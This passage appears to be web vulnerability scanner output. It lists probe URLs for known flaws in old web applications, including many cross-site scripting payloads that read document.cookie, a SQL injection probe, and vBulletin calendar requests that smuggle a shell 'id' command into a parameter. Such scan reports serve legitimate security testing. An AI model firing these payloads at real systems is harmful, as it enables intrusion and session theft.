(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
name=Surveys&amp;pollID=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : The PHPNuke<br>
forum is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?<br>
name=Stories_Archive&amp;sa=show_month&amp;year=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;month=3&amp;month_l=test : The PHPNuke forum is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?name=Stories_Archive<br>
&amp;sa=show_month&amp;year=2002&amp;month=03&amp;month_l=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?name=Downloads<br>
&amp;d_op=viewdownloaddetails&amp;lid=02&amp;ttitle=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : This install of PHPNuke is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?name=Classifieds<br>
&amp;op=ViewAds&amp;id_subcatg=75&amp;id_catg=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?letter=%22%3E%3Cimg<br>
%20src=javascript:alert(document.cookie);<br>
%3E&amp;op=modload&amp;name=Members_List&amp;file=index : Post Nuke 0.7.2.3-<br>
Phoenix is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /members.asp?SF=%22;}alert(&#39;Vulnerable&#39;);function%20x()<br>
{v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross<br>
Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /megabook/admin.cgi?login=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Megabook guestbook is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /ldap/cgi-bin/ldacgi.exe?<br>
Action=&lt;script&gt;alert(\&quot;Vulnerable\&quot;)&lt;/script&gt; : IBM Directory Server<br>
4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.<br>
+ OSVDB-0: GET /launch.jsp?<br>
NFuse_Application=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : NFuse is<br>
vulnerable to cross site scripting (XSS) in the GetLastError function.<br>
Upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /launch.asp?<br>
NFuse_Application=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : NFuse is<br>
vulnerable to cross site scripting (XSS) in the GetLastError function.<br>
Upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /isapi/testisa.dll?<br>
check1=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /index.php?file=Liens&amp;op=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;);&lt;/script&gt; : Nuked-klan 1.3b is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /index.php?<br>
action=storenew&amp;username=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; :<br>
SunShop is vulnerable to Cross Site Scripting (XSS) in the signup<br>
page. CA-200-02.<br>
+ OSVDB-0: GET /index.php/content/search/?<br>
SectionID=3&amp;SearchText=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : eZ<br>
publish v3 and prior allow Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /index.php/content/advancedsearch/?<br>
SearchText=&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt;&amp;PhraseSearchText=&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt;&amp;SearchContentClassID=-1&amp;SearchSectionID=-1&amp;SearchDate=-1&amp;SearchButton=Search : eZ publish<br>
v3 and prior allow Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /gallery/search.php?<br>
searchstring=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Gallery 1.3.4<br>
and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the<br>
latest version. <a href="http://www.securityfocus.com/bid/8288" target="_blank">http://www.securityfocus.com/bid/8288</a>.<br>
+ OSVDB-0: GET /friend.php?<br>
op=SiteSent&amp;fname=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : This version<br>
of PHP-Nuke&#39;s friend.php is vulnerable to Cross Site Scripting (XSS).<br>
Upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /forum_members.asp?find=<br>
%22;}alert(&#39;Vulnerable&#39;);function%20x(){v%20=%22 : Web Wiz Forums ver.<br>
7.01 and below is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /forums/index.php?<br>
board=;action=login2&amp;user=USERNAME&amp;cookielength=120&amp;passwrd=PASSWORD&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : YaBB is vulnerable to Cross Site Scripting (XSS) in the<br>
password field of the login page. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /error/500error.jsp?et=1&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;; : Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is<br>
vulnerable to Cross Site Scripting (XSS) in the error pages. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /download.php?<br>
sortby=&amp;dcategory=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : This version<br>
of PHP-Nuke&#39;s download.php is vulnerable to Cross Site Scripting<br>
(XSS). Upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /comments.php?subject=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;comment=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;pid=0&amp;sid=0&amp;mode=&amp;order=&amp;thold=op=Preview : This version of<br>
PHP-Nuke&#39;s comments.php is vulnerable to Cross Site Scripting (XSS).<br>
Upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /cleartrust/ct_logon.asp?<br>
CTLoginErrorMsg=&lt;script&gt;alert(1)&lt;/script&gt; : RSA ClearTrust allows<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /cgi-local/cgiemail-1.6/cgicso?<br>
query=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : This CGI is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /cgi-local/cgiemail-1.4/cgicso?<br>
query=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : This CGI is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /calendar.php?year=&lt;script&gt;alert(document.cookie);&lt;/<br>
script&gt;&amp;month=03&amp;day=05 : DCP-Portal v5.3.1 is vulnerable to  Cross<br>
Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /ca000007.pl?ACTION=SHOWCART&amp;REFPAGE=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Actinic E-Commerce services<br>
is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /ca000001.pl?ACTION=SHOWCART&amp;hop=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;&amp;PATH=acatalog%2f : Actinic E-<br>
Commerce services is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /article.cfm?id=1&#39;&lt;script&gt;alert(document.cookie);&lt;/<br>
script&gt; : With malformed URLS, Coldfusion is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /apps/web/vs_diag.cgi?<br>
server=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Zeus 4.2r2<br>
(webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /addressbook/index.php?<br>
surname=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Phpgroupware 0.9.14.003<br>
is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /addressbook/index.php?<br>
name=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Phpgroupware 0.9.14.003 is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /a?&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Server is<br>
vulnerable to Cross Site Scripting (XSS) in the error message if code<br>
is passed in the query-string. This may be a Null HTTPd server.<br>
+ OSVDB-9239: GET /mailman/admin/ml-name?<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;; : Mailmain is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-3092: GET /sitemap.xml : This gives a nice listing of the site<br>
content.<br>
+ OSVDB-25499: GET /affich.php?image=&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : GPhotos index.php rep Variable XSS.<br>
+ OSVDB-25498: GET /diapo.php?rep=&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : GPhotos index.php rep Variable XSS.<br>
+ OSVDB-25497: GET /index.php?rep=&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : GPhotos index.php rep Variable XSS.<br>
+ OSVDB-700: GET /fcgi-bin/echo?foo=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-3954: GET /fcgi-bin/echo2?foo=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-700: GET /fcgi-bin/echo.exe?foo=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-3954: GET /fcgi-bin/echo2.exe?foo=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Fast-CGI has two default CGI programs (echo.exe/echo2.exe)<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-19947: GET /apps/web/index.fcgi?<br>
servers=&amp;section=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Zeus Admin<br>
server 4.1r2 is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-12606: GET /index.php?err=3&amp;email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-12607: GET /forgot_password.php?email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-12606: GET /bugs/index.php?err=3&amp;email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-12607: GET /bugs/forgot_password.php?email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-12606: GET /eventum/index.php?err=3&amp;email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-12607: GET /eventum/forgot_password.php?email=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : MySQL Eventum is<br>
vulnerable to XSS in the email field.<br>
+ OSVDB-2119: GET /shopexd.asp?catalogid=&#39;42 : VP-ASP Shopping Cart<br>
5.0 contains multiple SQL injection vulnerabilities. <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0560" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0560</a><br>
, <a href="http://www.securityfocus.com/bid/8159" target="_blank">http://www.securityfocus.com/bid/8159</a><br>
+ OSVDB-2562: GET /login/sm_login_screen.php?error=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : SPHERA HostingDirector and<br>
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-2562: GET /login/sm_login_screen.php?uid=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : SPHERA HostingDirector and<br>
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?error=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : SPHERA HostingDirector and<br>
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?uid=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : SPHERA HostingDirector and<br>
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-2617: GET /acart2_0/signin.asp?msg=&lt;script&gt;alert(\&quot;test\&quot;)&lt;/<br>
script&gt; : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities<br>
+ OSVDB-2695: GET /photo/ : My Photo Gallery pre 3.6 contains multiple<br>
vulnerabilities including .. traversal, unspecified vulnerabilities,<br>
and remote management interface access.<br>
+ OSVDB-2790: GET /index.php?vo=\&quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/<br>
script&gt; : Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-2921: GET /shopping/shopdisplayproducts.asp?<br>
id=1&amp;cat=&lt;script&gt;alert(&#39;test&#39;)&lt;/script&gt; : VP-ASP prior to 4.50 are<br>
vulnerable to XSS attacks<br>
+ OSVDB-3092: GET /archive/ : This might be interesting...<br>
+ OSVDB-3092: GET /clients/ : This might be interesting...<br>
+ OSVDB-3092: GET /directory/ : This might be interesting...<br>
+ OSVDB-3092: GET /forum/ : This might be interesting...<br>
+ OSVDB-3092: GET /home/ : This might be interesting...<br>
+ OSVDB-3092: GET /mp3/ : This might be interesting...<br>
+ OSVDB-3092: GET /new : This may be interesting...<br>
+ OSVDB-3092: GET /new/ : This might be interesting...<br>
+ OSVDB-3092: GET /news : This may be interesting...<br>
+ OSVDB-17670: GET /vc30/ : Site Server sample files.  This might be<br>
interesting...<br>
+ OSVDB-3093: GET /adv/gm001-mc/ : This might be interesting... has<br>
been seen in web logs from an unknown scanner.<br>
+ OSVDB-3233: GET /netbasic/websinfo.bas : Novell Netware 5.1 contains<br>
Novonyx default files which reveal system information. All default<br>
files should be removed.<br>
+ OSVDB-3280: GET /forum/memberlist.php?<br>
s=23c37cf1af5d2ad05f49361b0407ad9e&amp;what=\&quot;&gt;<br>
\&quot;&lt;script&gt;javascript:alert(document.cookie)&lt;/script&gt; : Vbulletin 2.2.9<br>
and below are vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-3289: GET /firewall/policy/dlg?<br>
q=-1&amp;fzone=t&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;&gt;&amp;tzone=dmz :<br>
Fortigate firewall 2.50 and prior contains several CSS vulnerabilities<br>
in various administrative pages.<br>
+ OSVDB-3294: GET /firewall/policy/policy?<br>
fzone=internal&amp;tzone=dmz1&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; :<br>
Fortigate firewall 2.50 and prior contains several CSS vulnerabilities<br>
in various administrative pages.<br>
+ OSVDB-3295: GET /antispam/listdel?<br>
file=blacklist&amp;name=b&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;startline=0 : Fortigate firewall 2.50 and prior contains<br>
several CSS vulnerabilities in various administrative pages.<br>
+ OSVDB-3295: GET /antispam/listdel?<br>
file=whitelist&amp;name=a&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;startline=0(naturally) : Fortigate firewall 2.50 and prior<br>
contains several CSS vulnerabilities in various administrative pages.<br>
+ OSVDB-3296: GET /theme1/selector?<br>
button=status,monitor,session&amp;button_url=/system/status/status,/system/<br>
status/moniter\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;,/system/status/<br>
session : Fortigate firewall 2.50 and prior contains several CSS<br>
vulnerabilities in various administrative pages.<br>
+ OSVDB-3296: GET /theme1/selector?<br>
button=status,monitor,session&amp;button_url=/system/status/status<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;,/system/status/moniter,/system/<br>
status/session : Fortigate firewall 2.50 and prior contains several<br>
CSS vulnerabilities in various administrative pages.<br>
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;&amp;button_url=/system/status/<br>
status,/system/status/moniter,/system/status/session : Fortigate<br>
firewall 2.50 and prior contains several CSS vulnerabilities in<br>
various administrative pages.<br>
+ OSVDB-3299: GET /forumscalendar.php?<br>
calbirthdays=1&amp;action=getday&amp;day=2001-8-15&amp;comma=%22;echo%20&#39;&#39;;%20echo<br>
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command<br>
execution. See <a href="http://www.securiteam.com/securitynews/5IP0B203PI.html" target="_blank">http://www.securiteam.com/securitynews/5IP0B203PI.html</a><br>
+ OSVDB-3299: GET /forumzcalendar.php?<br>
calbirthdays=1&amp;action=getday&amp;day=2001-8-15&amp;comma=%22;echo%20&#39;&#39;;%20echo<br>
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command<br>
execution. See <a href="http://www.securiteam.com/securitynews/5IP0B203PI.html" target="_blank">http://www.securiteam.com/securitynews/5IP0B203PI.html</a><br>
+ OSVDB-3299: GET /htforumcalendar.php?<br>
calbirthdays=1&amp;action=getday&amp;day=2001-8-15&amp;comma=%22;echo%20&#39;&#39;;%20echo<br>
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command<br>
execution. See <a href="http://www.securiteam.com/securitynews/5IP0B203PI.html" target="_blank">http://www.securiteam.com/securitynews/5IP0B203PI.html</a><br>
+ OSVDB-3299: GET /vbcalendar.php?<br>
calbirthdays=1&amp;action=getday&amp;day=2001-8-15&amp;comma=%22;echo%20&#39;&#39;;%20echo<br>
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command<br>
execution. See <a href="http://www.securiteam.com/securitynews/5IP0B203PI.html" target="_blank">http://www.securiteam.com/securitynews/5IP0B203PI.html</a><br>
+ OSVDB-3299: GET /vbulletincalendar.php?<br>
calbirthdays=1&amp;action=getday&amp;day=2001-8-15&amp;comma=%22;echo%20&#39;&#39;;%20echo<br>
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command<br>
execution. See <a href="http://www.securiteam.com/securitynews/5IP0B203PI.html" target="_blank">http://www.securiteam.com/securitynews/5IP0B203PI.html</a><br>
+ OSVDB-3417: GET /examplesWebApp/InteractiveQuery.jsp?<br>
person=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : BEA WebLogic 8.1 and<br>
below are vulnerable to Cross Site Scripting (XSS) in example code. <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0624" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0624</a>. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-3458: GET /sgdynamo.exe?HTNAME=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Ecometry&#39;s SGDynamo is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0375" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0375</a>. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-3486: GET /aktivate/cgi-bin/catgy.cgi?<br>
key=0&amp;cartname=axa200135022551089&amp;desc=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Aktivate Shopping Cart 1.03 and lower are vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.allen0keul.com/aktivate/" target="_blank">http://www.allen0keul.com/aktivate/</a> <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1212" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1212</a>, <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-4262: GET /addressbook.php?\&quot;&gt;&lt;script&gt;alert(Vulnerable)&lt;/<br>
script&gt;&lt;!-- : Squirrel Mail 1.2.7 is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-4265: GET /help.php?chapter=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-4356: GET /acart2_0/deliver.asp?msg=&lt;script&gt;alert(\&quot;test\&quot;)&lt;/<br>
script&gt; : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities<br>
+ OSVDB-4357: GET /acart2_0/error.asp?msg=&lt;script&gt;alert(\&quot;test\&quot;)&lt;/<br>
script&gt; : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities<br>
+ OSVDB-4358: GET /acart2_0/admin/error.asp?msg=&lt;script&gt;alert(\&quot;test<br>
\&quot;)&lt;/script&gt; : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities<br>
+ OSVDB-4359: GET /acart2_0/admin/index.asp?msg=&lt;script&gt;alert(\&quot;test<br>
\&quot;)&lt;/script&gt; : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities<br>
+ OSVDB-5097: GET /wwwping/index.stm?<br>
wwwsite=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server<br>
default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/create.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/edit.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/ftp.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/htaccess.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/iecreate.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
